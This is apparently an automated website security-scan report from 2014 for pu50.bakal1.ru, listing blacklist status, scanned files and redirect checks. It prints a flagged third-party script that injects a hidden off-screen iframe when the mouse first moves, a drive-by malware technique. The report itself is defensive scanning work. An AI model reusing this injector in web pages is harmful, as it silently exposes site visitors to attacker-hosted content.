Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pu50.bakal1.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pu50.bakal1.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pu50.bakal1.ru/ | 200 OK Content-Length: 23973 Content-Type: text/html | clean |
http://pu50.bakal1.ru/./jquery-1.4.2.min.js | 200 OK Content-Length: 72174 Content-Type: application/javascript | clean |
http://pu50.bakal1.ru/./fancybox/jquery.easing-1.3.pack.js | 200 OK Content-Length: 6717 Content-Type: application/javascript | clean |
http://pu50.bakal1.ru/./fancybox/jquery.fancybox-1.3.0.pack.js | 200 OK Content-Length: 15071 Content-Type: application/javascript | clean |
http://pu50.bakal1.ru/./fancybox/jquery.mousewheel-3.0.2.pack.js | 200 OK Content-Length: 1157 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21183 Content-Type: text/javascript | clean |
http://www.clocklink.com/embed.js | 200 OK Content-Length: 2949 Content-Type: text/javascript | clean |
http://feelthesame.changeip.name/rsize.js | 200 OK Content-Length: 405 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) res='ÐÑибка MySQL'; var astatf = 0; document.write("<head></head><b><div id='staticaccoin'></div></b>"); document.onmousemove=moveonlinetest; function moveonlinetest() { if (astatf == 0) { astatf++; text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>"; document.getElementById("staticaccoin").innerHTML = text }} Antivirus reports:
| ||
http://pu50.bakal1.ru/index.php?start_from=7&ucat=&archive=&subaction=&id=& | 200 OK Content-Length: 24119 Content-Type: text/html | clean |
http://pu50.bakal1.ru/index.php?start_from=0&ucat=&archive=&subaction=&id=& | 200 OK Content-Length: 23973 Content-Type: text/html | clean |
http://pu50.bakal1.ru/index.php?start_from=14&ucat=&archive=&subaction=&id=& | 200 OK Content-Length: 24201 Content-Type: text/html | clean |
http://pu50.bakal1.ru/index.php?start_from=21&ucat=&archive=&subaction=&id=& | 200 OK Content-Length: 23724 Content-Type: text/html | clean |
http://pu50.bakal1.ru/./news.php | 200 OK Content-Length: 185174 Content-Type: text/html | clean |
http://www.calend.ru/img/export/informer_new_theme1.js? | 200 OK Content-Length: 2856 Content-Type: application/x-javascript | clean |
http://pu50.bakal1.ru/news.php?subaction=showfull&id=1336027592&archive=&start_from=&ucat=3& | 200 OK Content-Length: 36901 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pu50.bakal1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Aug 2014 15:43:19 GMT
Server: nginx/1.6.0
Content-Type: text/html
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: pu50.bakal1.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 20 Aug 2014 15:43:19 GMT
Server: nginx/1.6.0
Content-Type: text/html
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: pu50.bakal1.ru
Referer: http://www.google.com/search?q=pu50.bakal1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pu50.bakal1.ru
Referer: http://www.google.com/search?q=pu50.bakal1.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.